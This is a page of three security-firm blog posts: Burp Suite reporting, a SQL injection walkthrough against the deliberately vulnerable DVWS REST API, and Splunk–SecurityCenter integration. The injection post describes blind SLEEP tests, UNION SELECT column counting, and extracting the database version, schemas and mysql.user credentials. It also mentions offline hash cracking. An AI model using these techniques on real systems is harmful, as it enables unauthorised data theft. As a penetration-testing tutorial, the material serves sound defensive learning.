Innovative Minds - On Point - One Group  

MindPoint Group Blog


REST Assured: Penetration Testing REST APIs Using Burp Suite: Part 3 – Reporting


Welcome back to the REST Assured blog series for Part 3: Reporting. While often overlooked by security professionals, compiling reports is almost always required among penetration testers post-testing. That’s why today we’re going to review how to put all of our findings together and have a thorough paper trail.


Using Burp Suite, it’s relatively easy to generate dumps of all the tests that were performed by using Intruder. Making it human-readable is another thing. In the Intruder window, select Save > Results Table. Burp Suite will generate a pop-up from which a number of options may be chosen. Here are my recommended configurations based on the attacks we performed:

Due to the nature of how we tested, Burp Suite isn’t able to automatically associate an intruder-based attack with a vulnerability and remediation strategy. So, unfortunately, it’s on us to parse the reviews manually and flag any anomalies worth including in a remediation strategy. To make the output file easy on the eyes, my recommendation would be to use Microsoft Excel, create a new spreadsheet, go to Data > from text/csv> and choose the output file we just created. From there, Excel should start an import wizard. Make sure you select “Edit” to verify the data has columns. Since some of our attacks include commas, we had to use tab as a delimiter. So, from the editing window choose “Split column,” and from the delimiter pull-down, make sure Tab is selected and hit OK. If it looks okay, hit close and load. We should now have a workable table that includes every attack we performed except for the repeater attacks, which I’ll get to in a minute.

Next, we need to include the server’s responses to each of these attacks. This is where our throttling comes from in part 1 of this blog series when we were configuring Burp Suite to slow down its automated scans. Although it adds a lot more testing time, it is 100% required if we want our server response packets in an order that matches the Request# from our first set of data from the attacks. To do this, from the Burp Suite Intruder window, select Save > Server Responses. Create a folder for the server responses and make sure “Concatenate to a single file” is NOT You’ll see why in a second.

In Excel, go to the Data tab again > Get Data > From File > From Folder. Select the folder we just saved the responses to and click OK. Make sure to click Edit when it shows us the import. On the Content column header, click the button circled in red below.

In the pop-up, choose on the delimiter pull-down to choose “Tab.” Then Click OK, then Save & Load. From here you should have a workable data-dump of every packet that you can now order in the “name” column which will match the Request Number of the previous data set. So now we have an exhaustive, sortable spreadsheet of all the attacks we attempted in the intruder scan.

Reporting on the repeater testing we performed is super easy. All we need to do is select the body of the request inside Burp Suite, right-click > Save Item. It’s that easy. Make sure to uncheck Base64-encode requests and responses,” as this will ensure the packets are human readable. We’ll have to do this for all the requests of value that we used in the penetration test, but Burp Suite will save them as an XML file and they’re relatively easy to parse and include everything in both sent and received packets.

That should be it as far as generating our paper trail! Everything is accounted for and documented in our testing.

Although we only really focused on conducting SQL injection testing, you can use this blog as a logical guide with other tests such as Cross-Site Scripting and Cross-Site Request Forgery.

Both are excellent reads and I highly recommend them.

In conclusion I hope you enjoyed following along in this blog series learning about how to test these RESTful API services as more and more service providers keep promoting these interfaces. I think they’re wonderful personally, as they can extend so much functionality to the people who use them; however, as we just found out, testing them can require some extra steps.  Feel free to comment on this blog or reach out to me on social media with any questions or comments! I really appreciate you taking the time to stop by and hopefully learn a thing or two about conducting your own, safe penetration tests on RESTful APIs using Burp Suite!

Interested in learning more about our Proactive Security Services?  Click this link

Categories: Application Security, Cyber Security, ISP Blog, Pen Test, Vulnerability Assessment, Vulnerability Management and tagged , , ,

MindPoint Group Blog


REST Assured: Penetration Testing REST APIs Using Burp Suite: Part 2 – Testing


Welcome back! In part 1 of REST Assured blog series, we discussed the definitions and history behind APIs, and we reviewed the proper configuring of Burp Suite for conducting security testing against them. In Part 2 of the blog, we’re going to be getting into the fun part: Testing.


I’ll preface the testing first by mentioning that it’s important to have familiarity with the HTTP status codes to help us better understand how the server is handling our attack packets. Below is a subset of HTTP status codes from OWASP that can be used as a point of reference:

Status code Message Description
200 OK Response to a successful REST API action. The HTTP method can be GET, POST, PUT, PATCH or DELETE
201 Created The request has been fulfilled and resource created. A URI for the created resource is returned in the Location header
202 Accepted The request has been accepted for processing, but processing is not yet complete
400 Bad Request The request is malformed, such as message body format error
401 Unauthorized Wrong or no authentication ID/password provided
403 Forbidden It’s used when the authentication succeeded but authenticated user doesn’t have permission to the request resource
404 Not Found When a non-existent resource is requested
406 Unacceptable The client presented a content type in the Accept header which is not supported by the server API
405 Method Not Allowed The error for an unexpected HTTP method. For example, the REST API is expecting HTTP GET, but HTTP PUT is used
413 Payload too large Use it to signal that the request size exceeded the given limit e.g. regarding file uploads
415 Unsupported Media Type The requested content type is not supported by the REST service
429 Too Many Requests The error is used when there may be DOS attack detected or the request is rejected due to rate limiting
500 Internal Server Error An unexpected condition prevented the server from fulfilling the request. Be aware that the response should not reveal internal information that helps an attacker, e.g. detailed error messages or stack traces.
501 Not Implemented The REST service does not implement the requested operation yet
503 Service Unavailable The REST service is temporarily unable to process the request. Used to inform the client it should retry at a later time.

source URL:

So, given this information, let’s take a look at some of my results and see if you can see anything odd or unusual:

The very first request here (Request 0) is our control, and there isn’t any modification to the original request, so it returned what we were expecting. However, if you look closely at the other attack packets, their status is all HTTP 200. If that truly is the case, then this application has a major problem with how it handles these attacks as they shouldn’t be getting HTTP 200 statuses (they should be 400 at the API level or 404 since we’re messing with the URL). Let’s take a closer look at some of these.

Yikes! This would be pretty bad to see in the real world. This type of error is specifically generated by the database, MariaDB, which means that we have successfully touched the backend of the system through this interface. Now it’s just a matter of time until we’re able to get something other than errors. Also, now we understand why it’s returning HTTP 200; the API processed the request, but the backend SQL threw an error. Looking at the error message it looks as though the “a” in the payload was taken as it’s not in the response, which makes me believe the parameter we’re attacking is supposed to be an integer, not a character. It’s also possible the rest of the injection is breaking the backend requests, which is a good sign as an attacker. Let’s look at an attack that starts with an integer.

Well, there you have it. The whole table was dumped. We knew ahead of time that this particular service was vulnerable to this attack though, so let’s look at some other findings that would serve as a more practical test:

For this attack we tried to inject a “sleep” command, which just tells the database to wait a set number of seconds; however, we’re not 100% sure what happened. The database didn’t throw an error, but it didn’t return anything either. This result is a common example of a finding that requires follow-up. I turned on the columns that show us the response time to give us an idea. I don’t believe we successfully injected a sleep statement based on the response time, but if we right-click this attack, we can forward it to the repeater to make our own changes to help us dig deeper into what is happening.

Here you can see the response time of our request is 13 milliseconds (bottom right of response), so the command isn’t taking, but it’s not throwing errors. Let’s try messing with some things:

In the request above, we can see that encoding our characters is getting translated in the response. We’ve also learned through the error messages that this database is running MariaDB. Let’s include the integer value for the user ID before our attack this time and see what happens:

Bingo. We successfully got the MariaDB server to execute the command “SLEEP(5)” and we verified it in the response time it took (5 seconds) on the bottom right of the response. The SLEEP command is an extremely common way of testing for Blind SQL Injection due to the somewhat Boolean response from the server itself. The sleep timer either worked or it didn’t. The successful execution of the “SLEEP” command can enable us to gain more information about the database’s syntax and get a deeper understanding of what is happening behind the curtain. Let’s pretend we didn’t dump the table already and take this a step further now that we’ve succeeded in injecting commands and see how far the rabbit hole goes.

So, we did a couple of things here. The first thing we did is add “1=2” after the AND, which basically modifies the original query to not return anything (it’s returning false). The false statement is important because we want to count how many columns the query is selecting by injecting our own “UNION SELECT” command. Here we start with a single “NULL” value. Notice in the response that the database is saying that’s not the right number of columns selected. Let’s keep adding NULL values until we get something that takes (assuming we didn’t already know a valid query returns two columns).

Okay, so now we know we have the correct number of columns selected for this specific query. Once we have the correct format for our commands, we can use this as a blueprint for some nastier things, such as:

Ah-ha! Success! By adding @@version in place of a NULL value, we’re able to increase our understanding of the database itself. Moving forward:

Using @@datadir we can determine this is a Windows OS hosted database due to the file structure. This hosted operation system can be useful for later attacks if we ever try to grab any system files or folders (If this were linux we could later try to grab/etc/passwd for example). Let’s check on the account that the database itself is using to give us an idea of its privileges.

That’s convenient. Looks like a stock root account (a default setup for DVWS which explains the insecurities in this configuration). Now for my favorite part, stealing account credentials!

Above we modified the UNION SELECT command to select users and their passwords from “mysql.user” which is where the user account information is stored. You’ll notice in this test instance, the account passwords (listed in the “last_name” fields) are blank, which is due to the stock setup of DVWS. If this were a live or test system, we would (hopefully) be seeing the hashes of their passwords there. With that information we can conduct off-line brute forcing or using a rainbow table to crack the hashes. There’s a number of existing tools to assist with cracking the hashes (hashcat, John the Ripper, etc.), but we’ll leave that to a future discussion. Next up, let’s look at the list of databases:

You can see here that we’re continuing to modify the values we’re selecting, and in this case we selected “schema_name” from “information_schema.schemata.” This will return us with a list of all the databases running on the server: dvws, information_schema, mysql, performance_schema, phpMyAdmin, and test. Now going deeper, let’s investigate the columns for each of these:

It’s possible to extend this command to continue cleaning up the type of information shown here, but you can see where we’re going. We can continue to modify this attack, a request at a time, until we’re able to dump everything from each database which we have access to. Once we learned this was a MySQL server, we can use that to guide us into making the modifications to the attack query, and targeting its syntax and structure. I’m fairly confident that we could even modify this search query to do things like dump every database and its contents to a file, then return it to us, considering we already determined we can execute privileged commands. Dumping the contents to a file could give us as attackers plenty of time to go over the content if we were worried about generating excess logs or if time is of the essence. I think this is a safe place to end our SQL injection testing since we pretty much proved we can now do anything we want with the MySQL server.

What’s Next?

This will conclude Part 2: Testing of the REST Assured blog series. Stay tuned for Part 3 on reporting where we’ll learn how to put everything together into manageable data sets and wrap up this series.

Interested in learning more about our Proactive Security Services?  Click this link

Categories: Application Security, Cyber Security, Pen Test, Vulnerability Assessment, Vulnerability Management and tagged , , ,

MindPoint Group Blog


A Tale Of Two Tools: When Splunk met SecurityCenter


Co-Authors:  Keith Rhea and Alex Nanthavong

It was the best of times, it was the worst of times, it was the age of technological advancements, it was the age of attack, it was the epoch of cybercrime, it was the epoch of opportunity, it was the season of Remediation, it was the season of Exploitation, it was the spring of Security, it was the winter of Vulnerability. We had targets and queries before us, with the data all going direct to SecurityCenter, while the queries were all staying in Splunk — in short, the race between attackers’ access to exploits and defenders’ ability to assess, remediate and mitigate them remained a never-ending cycle. The usefulness and identification of new vulnerabilities could no longer rely on either tool operating independently of each other. When Splunk met SecurityCenter, the alerts of outstanding vulnerabilities were received for remediation before compromise and helped to stay ahead of exploitation.[1]

With the integration of security tools, vulnerability management programs can improve the security posture of cloud environments. Tenable Research published a study that measured the difference in time between when an exploit for a vulnerability becomes publicly available (Time to Exploit Availability (TtEA)), and when a vulnerability is first assessed (Time to Assess (TtA)). The delta, negative or positive, indicates the window of opportunity (or lack thereof) for an attacker to exploit an unknown vulnerability. The researchers used a sample set for this analysis based on the 50 most prevalent vulnerabilities from nearly 200,000 unique vulnerability assessment scans over a 3-month period in late 2017, the findings from the researchers below indicate that attackers have a significant advantage over defenders.

As migration to the cloud and adoption of cloud business models increase, the introduction of cloud assets to those environments is constantly increasing and decreasing. Traditional forms of asset tracking are woefully inefficient in highly dynamic cloud environments. This extends to traditional vulnerability management systems and techniques as well. In order to improve the TtA, the implementation of continuous vulnerability assessments can be used. However, that alone is not enough to fully mitigate the nightmare of performing effective vulnerability management in these rapidly changing environments. Analysis of vulnerability scanning behavior for most organizations indicates that just over 25 percent of organizations are conducting vulnerability assessments with a frequency of two days or fewer. Contrary to popular belief, a successful vulnerability management program includes more than just a snapshot in time scan of an environment. While point in time scanning is an achievable first step for most organizations, that will reduce the head start that attackers have for most vulnerabilities, it still leaves a negative delta and exposure gap for many vulnerabilities. The impact of this exposure gap can be significant depending on the vulnerabilities in question. Shortening the window between scans and moving towards continuous or near real-time vulnerability scanning will have the most positive impact on the TtEA vs TtA time delta.

Not only should regular scanning occur, but there needs to be careful analysis of the vulnerabilities identified to determine the risks associated with those vulnerabilities, dependent on any compensating controls available in the environment. This analysis provides the basis behind the determination of the remediation timeframes. Everyone agrees that vulnerability management is a necessary function of an effective security practice, in our experience however this is not enough to combat the speed at which attackers move. We advocate for organizations to shorten the vulnerability scan cycle time as much as possible, while also improving upon traditional, static asset tracking by gathering data dynamically from sources like cloud infrastructure APIs and CMDBs. As Dickens says, as if he were a Security Officer, “Nothing that we do, is done in vain. I believe, with all my soul, that we shall see triumph.”[1]

Achieving Better TtA via Integration of Splunk and SecurityCenter

MindPoint Group security engineers were able to enhance all phases of their vulnerability management program by integrating Splunk and Tenable SecurityCenter. This integration allows the team to gather asset data via the cloud infrastructure API and correlate that data with near real-time vulnerability data. The team is now able to adapt and react more quickly to the rapidly evolving threat landscape in highly dynamic operating environments. The correlation and analysis of vulnerabilities within a highly dynamic cloud environment is made possible by using SecurityCenter to scan, consolidate, and evaluate vulnerability scans across the organization, and Splunk to aggregate vulnerability data, asset data, and other sources of events and log data from various components of a large cloud environment. With all these sources of data ingested real-time into the Splunk environment, reports and alerts can now be generated to provide in-depth, on-demand vulnerability data to address potential threats as they are discovered.

So How Does it Work?

Security tooling is important, and having tools configured and operating correctly is an important first step for a security team. The effectiveness of individual security tools is greatly reduced when they operate independently of each other, and many security teams greatly increase their effectiveness by working to integrate existing tools, processes, and data sources, instead of buying yet another tool. The diagram above  illustrates the vulnerability management process and the components needed to integrate SecurityCenter, and Splunk. This integration is important because it provides security teams with the ability to move beyond the old standards and methods of periodic vulnerability scanning. Integration of these two tools, provides security teams with an enhanced view of their data for improved aggregation, searching, and reporting capabilities. An enhanced vulnerability management approach based on an agile, API driven, DevSecOps model is necessary to decrease the TtA vulnerabilities and ultimately shorten the time delta for defenders. Each tool plays a crucial role in the overall integration of the two and enables security teams to have more actionable information to ensure timely remediation.

Once scan data, cloud asset data, and other data sources have been fed into Splunk we are able to use the following query:

index=tenable* (
    [ search index=tenable!=*DEAD*!=*Security* (* OR*)
    | rename as ScanName
    | convert num(scan_result_info.finishTime) as time
    | eval finish=strftime(time, "%Y-%m-%d %H:%M:%S")
    | dedup ScanName
    | table ScanName finish
    | return 15])
    | lookup aws-instances.csv private_ip_address as ip
    | search tags.ApplicationID=* accountName=* tags.op_env=*
    | stats count

From within Splunk we are then able to produce reports, alerts, and dashboards to provide development, operations, and security teams with in-depth, on-demand vulnerability data to address potential threats as they are discovered. Alerts can be customized so that they are generated using the remediation and prioritization criteria mandated by an organization.

Once security teams are continuously alerted and armed with vulnerability data, they are better able to align operational processes to support rapid response and ad hoc remediation and mitigation requests outside of regular maintenance and patch windows. Those efforts for targeted remediation and prioritization can be better focused on vulnerabilities with publicly available exploits and those actively being targeted by malware, exploit kits and ransomware.

This enables up-to-date situational awareness and threat context to evaluate true risk and exposure as well as to inform and guide decision making. By leveraging the integration of Tenable, Splunk, and AWS, vulnerability, configuration, and asset data can be used to conduct deep security analysis, and achieve the awareness, perspective and information needed to make effective security decisions.


[1] Dickens, C. (1867). A Tale of two cities, and Great expectations (Diamond ed.). Ticknor and Fields, Book 1, Chapter 1: The Period

[2] Dickens, C. (1867). A Tale of two cities, and Great expectations (Diamond ed.). Ticknor and Fields, Book 2, Chapter 16: Still Knitting

Quantifying the Attacker’s First-Mover Advantage. (2018, May 24). Retrieved June 1, 2018, from

Categories: Architecture and Engineering, Cloud, Configuration Management, Cyber Security, Engineering and Architecture, ISP Blog, Qualitative Analysis, Quantitative Analysis, Risk Assessment, Risk Management, Vulnerability Assessment, Vulnerability Management and tagged , , , , , , , , , , , , , , , , ,